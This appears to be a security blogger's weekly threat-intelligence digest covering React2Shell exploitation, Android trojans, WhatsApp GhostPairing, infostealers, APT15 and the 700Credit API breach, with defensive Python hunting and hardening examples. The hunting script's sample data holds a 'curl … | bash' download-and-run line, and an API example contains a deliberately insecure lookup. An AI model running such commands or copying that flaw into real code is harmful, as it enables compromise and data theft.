EvilBit Threat Digest - Multiple Actors, Multiple Platforms, Multiple Headaches
React2Shell exploitation surges, Android trojans and WhatsApp GhostPairing spread, 700Credit breach hits millions, new stealers and APT ops.
KryptoKat here. It's been one of those weeks where the incident queue starts to blur together--React exploitation updates, a wave of Android banking trojans, credential stealers with holiday-themed branding, and a breach affecting millions of car buyers. The connective tissue? Attackers are diversifying their approach, hitting every platform they can reach and every trust relationship they can abuse. From WhatsApp's device-linking feature to credit check APIs, the week's stories share a common theme: legitimacy is the best disguise.
Let's sort through what actually demands your attention.
React2Shell: The Clustering Continues
We've been tracking CVE-2025-55182 since early December, and the exploitation landscape keeps expanding. Google Threat Intelligence Group's latest analysis confirms at least five distinct threat clusters are now actively exploiting the React Server Components vulnerability, each deploying different malware families.
The identified payloads include MINOCAT (a tunneling tool), SNOWLIGHT (a downloader), HISONIC and COMPOOD (backdoors), and the usual XMRig cryptominers. What's notable this time is the sophistication of the persistence mechanisms: attackers are deploying hidden cron jobs, systemd services disguised as system updates, and modifications to shell configuration files to maintain access even after the initial webserver compromise is cleaned up.
For defenders still working through remediation, the updated hunting guidance is critical. Look for processes spawned by your Node.js runtime executing wget, curl, or bash, especially to download binaries from suspicious infrastructure. Google published YARA rules targeting the specific malware families, and the IOC list includes domains like those documented in their December 12 advisory.
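One way to operationalize that process-lineage hunt, as an added example that is not part of Google's guidance or this digest's original text: the script below walks constructed process-start events (JSON lines carrying pid, ppid, exe and argv, a shape you would map onto whatever your EDR or auditd export actually emits) and flags any curl, wget or shell process whose ancestor chain passes through a Node.js runtime, noting whether its command line references a download URL. The sample events, addresses and file names are constructed for the example.

```python
"""Hunt for download/shell tooling spawned beneath a Node.js runtime.

Added example (not Google's or the digest's code). Input is constructed
process-start telemetry in JSON-lines form: pid, ppid, exe, argv. Adapt the
field names to whatever your EDR or auditd export actually produces.
"""
import json
import os

# Constructed sample telemetry. pid 100 is the Next.js server; 101-103 are the
# sort of children a post-exploitation one-liner spawns. 200/201 and 300/301
# are benign: a build script running git, and a deploy script running curl
# with no Node.js ancestor.
SAMPLE_EVENTS = """
{"pid": 100, "ppid": 1,   "exe": "/usr/bin/node", "argv": ["node", "server.js"]}
{"pid": 101, "ppid": 100, "exe": "/bin/sh",       "argv": ["sh", "-c", "curl -s http://203.0.113.5/x.sh | bash"]}
{"pid": 102, "ppid": 101, "exe": "/usr/bin/curl", "argv": ["curl", "-s", "http://203.0.113.5/x.sh"]}
{"pid": 103, "ppid": 101, "exe": "/bin/bash",     "argv": ["bash"]}
{"pid": 200, "ppid": 1,   "exe": "/usr/bin/node", "argv": ["node", "build.js"]}
{"pid": 201, "ppid": 200, "exe": "/usr/bin/git",  "argv": ["git", "rev-parse", "HEAD"]}
{"pid": 300, "ppid": 1,   "exe": "/usr/bin/bash", "argv": ["bash", "deploy.sh"]}
{"pid": 301, "ppid": 300, "exe": "/usr/bin/curl", "argv": ["curl", "https://registry.npmjs.org/"]}
"""

RUNTIME_NAMES = {"node", "nodejs"}
SUSPICIOUS_TOOLS = {"wget", "curl", "bash", "sh", "dash"}


def parse_events(text):
    """Return {pid: event} from JSON-lines text, skipping blank lines."""
    procs = {}
    for line in text.splitlines():
        line = line.strip()
        if line:
            ev = json.loads(line)
            procs[ev["pid"]] = ev
    return procs


def node_ancestor(procs, ev):
    """Walk the parent chain; return the nearest Node.js ancestor or None.
    The seen-set guards against cycles in incomplete telemetry."""
    seen = set()
    cur = procs.get(ev["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if os.path.basename(cur["exe"]) in RUNTIME_NAMES:
            return cur
        cur = procs.get(cur["ppid"])
    return None


def hunt(text):
    """Flag suspicious tools whose lineage passes through a Node.js runtime."""
    procs = parse_events(text)
    hits = []
    for ev in procs.values():
        tool = os.path.basename(ev["exe"])
        if tool not in SUSPICIOUS_TOOLS:
            continue
        anc = node_ancestor(procs, ev)
        if anc is None:
            continue
        argv = ev["argv"]
        hits.append({
            "pid": ev["pid"],
            "tool": tool,
            "node_pid": anc["pid"],
            # A URL on the command line is the strongest sign of a fetched payload.
            "fetches_url": any("http://" in a or "https://" in a for a in argv),
            "cmdline": " ".join(argv),
        })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Run against the sample, the three children under pid 100 are reported (the shell, the curl fetch and the spawned bash) while the deploy-script curl under a plain bash parent is not; in production you would feed the same function a window of real process events and route hits with fetches_url set to the top of the queue.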
If you're still not patched--and I know some of you are waiting on vendor support for older Next.js versions--deploy the Cloud Armor WAF rules as a virtual patch and get those React Server Component packages updated to 19.0.1+, 19.1.2+, or 19.2.1+ immediately. This isn't slowing down.
Mobile Malware Season: Android Banking Trojans and WhatsApp Abuse
The mobile threat landscape delivered three distinct stories this week, each demonstrating a different angle on credential theft and device compromise.
Frogblight: Turkish Phishing via Fake Government Portals
Kaspersky's analysis of Frogblight describes a newly observed Android banking trojan targeting Turkish users through smishing campaigns that impersonate government court notifications. The initial lure directs victims to fake e-Challan or mParivahan-themed phishing pages, convincing them to sideload a malicious APK.
Once installed, Frogblight uses JavaScript injection into WebViews to intercept banking credentials as users log into their financial apps. It also harvests SMS messages, contact lists, files, and can send arbitrary SMS--classic banking trojan capabilities, but wrapped in a convincing government services lure. The malware supports both REST and WebSocket-based C2, and Kaspersky's report notes that the control panel is actively maintained with ongoing development. The IOCs include APK hashes, distribution URLs, and C2 domains that defenders can blocklist immediately.
NexusRoute: Impersonating India's Road Transport Ministry
CYFIRMA documented NexusRoute, a financially motivated Android RAT campaign impersonating India's Ministry of Road Transport and Highways. The attackers created GitHub-hosted clones of the legitimate mParivahan and e-Challan services, complete with convincing phishing pages that collect UPI PINs, banking credentials, and SMS/OTP interception.
The malicious APKs grant themselves extensive permissions--SMS read/send, contacts, call logs, camera, location, and accessibility services. Once deployed, the RAT conducts continuous surveillance and exfiltrates data to attacker-controlled servers. The campaign's infrastructure abuse is notable: using GitHub Pages for hosting and cloning legitimate government branding to build trust.
For defenders in the region, CYFIRMA provides concrete IOCs including APK hashes, GitHub repository URLs, and phishing domains. The immediate mitigation is user education: do not sideload apps from links received via SMS, and verify government service downloads through official app stores only.
GhostPairing: Full WhatsApp Takeover via Device Linking
This one's particularly clever. Gen Digital's Threat Labs and independent reporting documented a social engineering technique called GhostPairing that abuses WhatsApp's legitimate device-linking feature to grant attackers persistent access to a victim's account--no SIM swap or password theft required.
The attack works like this: victims receive a message about a supposed photo or video. Clicking the link takes them to a fake photo viewer page that prompts them to complete a "verification" step. This step is actually WhatsApp's legitimate device-pairing flow, which the victim unknowingly completes by scanning a QR code or entering a pairing code. The attacker's browser is now added as a linked device with full read and write access to the victim's WhatsApp.
From that point, the attacker can view all messages (historical and incoming), access media, and send messages as the victim. The session persists until the victim manually removes the linked device from Settings → Linked Devices--something most users never check.
The defense is procedural and educational: regularly audit your linked devices in WhatsApp settings, enable two-step verification (PIN), and treat any unsolicited request to scan a QR code or enter a pairing code as highly suspicious. Only initiate device linking from within the official WhatsApp app itself, never from a web page.
For SOC teams managing BYOD or corporate mobile fleets, this is a useful awareness campaign topic: demonstrate the attack, show users what linked devices look like in settings, and encourage regular audits.
The Infostealer Buffet: SantaStealer and Luca Stealer
Two new credential stealers surfaced this week, both worth tracking for their technical details and distribution models.
SantaStealer: Festive Branding, Fileless Execution
Rapid7's analysis of SantaStealer (a rebrand of the earlier BluelineStealer) shows a modular infostealer-as-a-service targeting Chromium-based browsers, Telegram, Discord, Steam, and cryptocurrency wallets. The malware is notable for its use of fileless techniques and reflective injection to load modules in memory without touching disk.
Early leaked builds--likely shared by disgruntled affiliates or researchers--contain plaintext configuration files and hard-coded C2 addresses, often communicating over TCP port 6767. The malware uses a distinctive upload pattern: HTTP POST requests with User-Agent: upload and multipart form data containing authentication headers. This makes detection straightforward in the short term, though operators should expect obfuscation and encryption to improve as the service matures.
Rapid7 published SHA-256 hashes for known samples and network indicators for C2 infrastructure. For defenders, the immediate actions are to ingest those hashes into EDR/AV, create IDS signatures for the upload pattern, and hunt for reflective injection and process hollowing behaviors (look for CreateRemoteThread and WriteProcessMemory API calls targeting browsers or other credential-rich processes).
Secondary coverage from The Register, BleepingComputer, and SC Magazine corroborates the findings and notes that the stealer specifically targets Chrome's AppBound Encryption feature, demonstrating that attackers are keeping pace with browser security improvements.
Luca Stealer: Rust Goes Cross-Platform
Multiple outlets reported on Luca Stealer, a Rust-based information stealer with confirmed builds for both Linux and Windows. The malware's open-source availability (it's been circulated in underground forums) increases the risk of rapid variant proliferation and copycat campaigns.
UncleSp1d3r (interjecting): Rust binaries can be challenging to reverse engineer primarily due to aggressive LLVM optimizations, extensive inlining, and monomorphization of generics, which obscure high-level structure. Every generic instantiation becomes a concrete copy. You don't get one clean function; you get N nearly-identical ones with subtle differences. Hope you like scrolling. Strings are often obfuscated or dynamically constructed, and the binary structures don't match the patterns that traditional static analysis tools expect (as a red teamer and a proud Rustacean, I'll take my non-idiomatic symbol patterns, but I acknowledge the plight of RE). For threat hunters, look for strings like cargoregistry and std::rt::lang_start_internal as indicators of Rust-built malware, and lean on dynamic analysis (sandboxing, network/file I/O instrumentation) to capture C2 behavior. Be careful of just searching for telltale signs of Rust code though, since this will result in false positives as Rust code is way more common than you might think.
The report from UZCERT (Uzbekistan's national CSIRT) provides a confirmed SHA-256 hash for one sample, which defenders can add to blocklists immediately. Cross-platform stealers are particularly dangerous in heterogeneous environments where a single phishing campaign can compromise both developer workstations (Linux) and end-user systems (Windows).
APT Espionage: Targeting Tactics and Regional Phishing
Two APT-related stories this week provide useful intelligence for defenders tracking state-sponsored activity.
APT15: Seven Years of Diplomatic Espionage
Picus Security's technical profile of APT15 (also known as Vixen Panda, Ke3chang, and Royal APT) consolidates the group's TTPs from campaigns spanning 2018 to 2025. The research, corroborated by an AlienVault OTX pulse with identical IOCs, maps the group's tradecraft to MITRE ATT&CK and links several CISA KEV-listed CVEs to their operations.
APT15's access vectors combine spearphishing attachments with exploitation of public-facing applications. Once inside, they deploy webshells, use valid accounts for persistence, and establish command-and-control over HTTP with data obfuscated via Base64 and URL-safe encoding variants. The group's exfiltration tradecraft is particularly stealthy: embedding stolen data in HTTP Cookie and Set-Cookie headers, and using steganography to hide payloads within image files.
For defenders, the immediate value is in the hunting guidance. Look for:
- Persistence via Active Setup registry entries and hidden scheduled tasks
- .lnk files in Startup folders
- HTTP traffic with large or Base64-encoded Cookie headers
- Image requests with unusually large file sizes or anomalous encoding patterns
- Decryption routines using TEA or RC4-like ciphers
Picus ties specific CVEs (including those affecting Microsoft WSUS, Oracle E-Business Suite, and Fortinet FortiWeb) to APT15 campaigns, providing a direct link between patching priorities and threat actor behavior.
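Two of the network indicators in this digest, the SantaStealer upload pattern described above (POST with User-Agent "upload" and multipart form data) and APT15's large or Base64-encoded Cookie headers, share one parsing step, so here is a single added example covering both. It is not Rapid7's or Picus's code; the thresholds (a 1024-byte Cookie header, a 256-character Base64-looking value) are assumptions to tune against your own traffic, and the sample requests are constructed. It inspects requests only; the same cookie logic applies unchanged to Set-Cookie on responses.

```python
"""Flag two HTTP request shapes: the SantaStealer upload pattern and the
APT15-style oversized or Base64-laden Cookie header.

Added example, not Rapid7's or Picus's code. Thresholds are assumptions.
"""
import base64
import binascii
import re

UPLOAD_UA = "upload"
MAX_COOKIE_BYTES = 1024      # assumption: ordinary cookie headers are far smaller
MIN_B64_VALUE = 256          # assumption: ordinary session tokens are shorter
B64_CHARS = re.compile(r"[A-Za-z0-9+/_=-]+")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers); header names
    are lower-cased. Accepts CRLF or LF line endings."""
    head = raw.replace("\r\n", "\n").strip("\n").partition("\n\n")[0]
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def looks_base64(value, min_len=MIN_B64_VALUE):
    """True if value is long and decodes as standard or URL-safe Base64
    (APT15 is reported to use URL-safe variants)."""
    v = value.strip()
    if len(v) < min_len or not B64_CHARS.fullmatch(v):
        return False
    std = v.replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)
    try:
        base64.b64decode(std, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def analyze_request(raw):
    """Return the sorted list of rule names the request trips (empty if clean)."""
    method, _path, h = parse_request(raw)
    findings = set()
    ua = h.get("user-agent", "")
    ctype = h.get("content-type", "")
    if method == "POST" and ua.lower() == UPLOAD_UA and ctype.lower().startswith("multipart/form-data"):
        findings.add("santastealer_upload_pattern")
    cookie = h.get("cookie", "")
    if len(cookie) > MAX_COOKIE_BYTES:
        findings.add("oversized_cookie")
    for part in cookie.split(";"):
        _name, _, value = part.strip().partition("=")
        if looks_base64(value):
            findings.add("base64_cookie_value")
    return sorted(findings)


# Constructed samples (not captured traffic). 198.51.100.0/24 is a documentation range.
STEALER_UPLOAD = (
    "POST /upload HTTP/1.1\r\n"
    "Host: 198.51.100.7:6767\r\n"
    "User-Agent: upload\r\n"
    "Content-Type: multipart/form-data; boundary=----constructed\r\n"
    "Content-Length: 0\r\n\r\n"
)
EXFIL_BLOB = base64.b64encode(b"constructed exfil payload " * 40).decode()
COOKIE_EXFIL = (
    "GET /images/logo.png HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    f"Cookie: session={EXFIL_BLOB}\r\n\r\n"
)
BENIGN_GET = "GET / HTTP/1.1\r\nHost: www.example.com\r\nCookie: sid=abc123; theme=dark\r\n\r\n"
BENIGN_UPLOAD = (
    "POST /api/files HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n"
    "Content-Type: multipart/form-data; boundary=----constructed\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in [("stealer", STEALER_UPLOAD), ("cookie-exfil", COOKIE_EXFIL),
                       ("benign-get", BENIGN_GET), ("benign-upload", BENIGN_UPLOAD)]:
        print(label, analyze_request(req))
```

The Base64 check deliberately requires both length and successful decoding rather than a character-class match alone, because ordinary session cookies are short Base64-looking strings and would otherwise drown the rule in noise; even so, expect to whitelist a few applications that legitimately stuff large encoded state into cookies.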
Russian Phishing Targets Baltics and Balkans
StrikeReady Labs documented a Russian APT credential phishing campaign targeting governments in the Baltic and Balkan regions (Lithuania, Bulgaria, Bosnia and Herzegovina, North Macedonia, Moldova, Montenegro, and Ukraine). The campaign, active since at least 2023, uses HTML decoy files to steal credentials and exfiltrate them via formcarry.com--a legitimate form-processing service.
The technique is straightforward but effective: victims receive spearphishing emails with HTML attachments disguised as official documents. Opening the file presents a fake login form that submits credentials to the attacker's formcarry.com endpoint. The use of a legitimate service makes blocking more complex and allows the campaign to evade basic email security controls.
StrikeReady provides MD5 hashes for the malicious HTML files in their GitHub repository. Our usual recommendations to deploy robust email security and educate users on the dangers of opening unsolicited attachments--especially those with misleading file names--apply here.
Breach Blotter: 700Credit Exposes Millions via Third-Party API
The week's major data breach story comes from the automotive financing sector. 700Credit confirmed a breach impacting approximately 5.6 to 5.8 million vehicle dealership customers. According to filed breach notifications and coverage from TechCrunch, an attacker exploited an exposed or misconfigured API endpoint tied to a compromised third-party integration.
The exposed data includes names, addresses, dates of birth, and Social Security numbers--the full identity theft starter pack. The breach occurred between roughly May and October 2025, with the attacker copying customer records from the 700Dealer.com platform by abusing API access that should have been restricted.
700Credit has disabled the vulnerable API, is notifying affected individuals and filing regulatory notices on behalf of impacted dealerships, and is offering 12 months of TransUnion credit monitoring. The company attributes the incident to a third-party partner compromise that cascaded into their own environment.
For defenders, this is a textbook lesson in API security failures:
- Validate requester identity and consumer reference IDs server-side (don't trust client-provided identifiers)
- Apply least privilege to third-party integrations with short-lived tokens and mutual TLS
- Rate-limit API calls and alert on anomalous bulk reads
- Conduct regular third-party security reviews and mandate breach notification in contracts
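The first three bullets lend themselves to a concrete contrast. What follows is an added, illustrative example written for this digest; it is not 700Credit's code and assumes nothing about their actual implementation, and the dealers, tokens and records in it are constructed. It shows a bulk customer-record lookup that trusts a client-supplied dealer_id beside one that derives the tenant from the caller's short-lived, scoped token, caps page size, and alerts on cross-tenant requests and bulk reads. Mutual TLS is a transport-layer control and is not shown.

```python
"""Vulnerable versus hardened bulk-read endpoint for the API failure class
described above. Added example, not 700Credit's code; all data is constructed.
"""

# Constructed sample data: customer records per dealership.
RECORDS = {
    "dealer-A": [{"ref": f"A-{i}", "name": f"Customer A{i}"} for i in range(50)],
    "dealer-B": [{"ref": f"B-{i}", "name": f"Customer B{i}"} for i in range(50)],
}

# Constructed integration tokens. Each is bound to exactly one dealer, carries
# a scope, and expires (the short-lived credential recommended above).
NOW = 1_700_000_000
TOKENS = {
    "tok-A": {"dealer": "dealer-A", "scopes": {"customers:read"}, "exp": NOW + 900},
    "tok-stale": {"dealer": "dealer-B", "scopes": {"customers:read"}, "exp": NOW - 1},
}

MAX_PAGE = 25               # hard cap on records per call
BULK_READ_THRESHOLD = 60    # records per token per window before alerting
WINDOW_SECONDS = 60


def vulnerable_lookup(request):
    """The failure class: the token proves the caller authenticated somehow,
    but the dealer whose records come back is chosen by the client. Any valid
    token can enumerate every tenant, and nothing caps or alerts on volume."""
    if request["token"] not in TOKENS:
        raise PermissionError("unauthenticated")
    return RECORDS.get(request["dealer_id"], [])


class BulkReadMonitor:
    """Counts records served per token in a sliding window and raises an alert
    once a caller exceeds the bulk-read threshold."""

    def __init__(self):
        self.events = {}   # token -> list of (timestamp, record_count)
        self.alerts = []

    def record(self, token, count, now):
        window = [(t, c) for t, c in self.events.get(token, []) if now - t < WINDOW_SECONDS]
        window.append((now, count))
        self.events[token] = window
        served = sum(c for _, c in window)
        if served > BULK_READ_THRESHOLD:
            self.alerts.append(f"{token}: {served} records in {WINDOW_SECONDS}s")
            return False
        return True


def hardened_lookup(request, monitor, now=NOW):
    """Tenant comes from the credential, scope and expiry are enforced, pages
    are capped, and anomalous behaviour is both denied and alerted on."""
    tok = TOKENS.get(request["token"])
    if tok is None or tok["exp"] <= now:
        raise PermissionError("invalid or expired token")
    if "customers:read" not in tok["scopes"]:
        raise PermissionError("missing scope")
    dealer = tok["dealer"]   # never taken from the request body or query string
    if request.get("dealer_id") not in (None, dealer):
        monitor.alerts.append(f"{request['token']}: cross-tenant request for {request['dealer_id']}")
        raise PermissionError("cross-tenant request")
    offset = max(0, int(request.get("offset", 0)))
    size = min(MAX_PAGE, max(1, int(request.get("page_size", MAX_PAGE))))
    page = RECORDS[dealer][offset:offset + size]
    if not monitor.record(request["token"], len(page), now):
        raise PermissionError("bulk-read threshold exceeded")
    return page


def _outcome(fn, request, monitor):
    try:
        fn(request, monitor)
        return "allowed"
    except PermissionError:
        return "denied"


def demo():
    """Exercise both handlers and return the outcomes so the contrast is checkable."""
    monitor = BulkReadMonitor()
    out = {}
    out["vulnerable_cross_tenant"] = len(vulnerable_lookup({"token": "tok-A", "dealer_id": "dealer-B"}))
    out["hardened_cross_tenant"] = _outcome(hardened_lookup, {"token": "tok-A", "dealer_id": "dealer-B"}, monitor)
    out["expired_token"] = _outcome(hardened_lookup, {"token": "tok-stale"}, monitor)
    out["capped_page"] = len(hardened_lookup({"token": "tok-A", "page_size": 100}, monitor))  # 25 served
    hardened_lookup({"token": "tok-A", "offset": 25}, monitor)                                  # 50 served
    out["bulk_read"] = _outcome(hardened_lookup, {"token": "tok-A"}, monitor)                  # 75 > 60
    out["alerts"] = len(monitor.alerts)
    return out


if __name__ == "__main__":
    print(demo())
```

The point of the monitor is less the denial than the alert: a partner integration that suddenly pages through every customer record is exactly the anomalous bulk read the bullets above ask you to catch, and it is visible only if volume per credential is tracked server-side.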
The BleepingComputer coverage notes minor variance in reported victim counts across sources, but the order of magnitude is clear: this is a large-scale exposure with significant downstream identity fraud risk.
Tooling Update: Kali Linux 2025.4
For those of us who live in the offensive security toolkit, Kali Linux 2025.4 shipped this week with updates that improve usability and expand capabilities for penetration testers and security researchers.
The major changes include:
- Desktop environment refreshes: GNOME 49, KDE Plasma 6.5, and Xfce updates
- Wayland becomes the default window server (with full VM guest support and fallback to X11 where needed)
- Kernel bump to 6.16 for improved hardware support
- Three new offensive/security tools: bpf-linker (for eBPF development), evil-winrm-py (Python implementation of the popular WinRM post-exploitation tool), and hexstrike-ai (an AI-assisted exploitation framework)
The Wayland transition is particularly relevant for operators running Kali in VirtualBox, VMware, or other virtualized environments--previous versions had inconsistent support, but 2025.4 makes it the smooth default experience.
For teams maintaining standardized pentesting images, this is your cue to update base builds and re-test tool compatibility. The official release notes include upgrade instructions and a full changelog.
Closing Thoughts
This week was a study in diversification--attackers targeting every layer of the stack, from web frameworks to mobile platforms to third-party integrations. React2Shell evolved from a single critical RCE into a multi-cluster exploitation event with distinct malware families. Mobile banking trojans are getting more sophisticated, with geographic targeting, WebView injection, and self-propagation mechanics. And the 700Credit breach is a painful reminder that your security perimeter extends to every third-party API you expose.
The defensive playbook is consistent: patch known vulnerabilities immediately, audit third-party access controls, educate users on social engineering tactics, and hunt for the specific IOCs published by researchers. The fundamentals work, but only if you actually implement them before the breach notification goes out.
And maybe--just maybe--audit your WhatsApp linked devices while you're at it. You'd be surprised what's connected.
Keep your detection sharp and your mitigations layered. The threat actors aren't slowing down, and neither can we.
-- KryptoKat
Recent Nessus Plugin Updates
For vulnerability management teams tracking scanner coverage, Tenable released updated Nessus plugins this week for:
- QNAP QTS and QuTS hero vulnerabilities
- Adobe ColdFusion updates (APSB25-105)
- Microsoft Azure Monitor Agent vulnerabilities
- Red Hat Enterprise Linux updates (Grafana, luksmeta)
- Rocky Linux updates (kernel, tomcat, wireshark)
- SUSE Linux Enterprise updates (postgresql16, python, kubernetes-client)
- Mozilla Firefox and Thunderbird (MFSA 2025-92)
- Apache Tomcat vulnerabilities
- PostgreSQL vulnerability (CVE-2025-12817)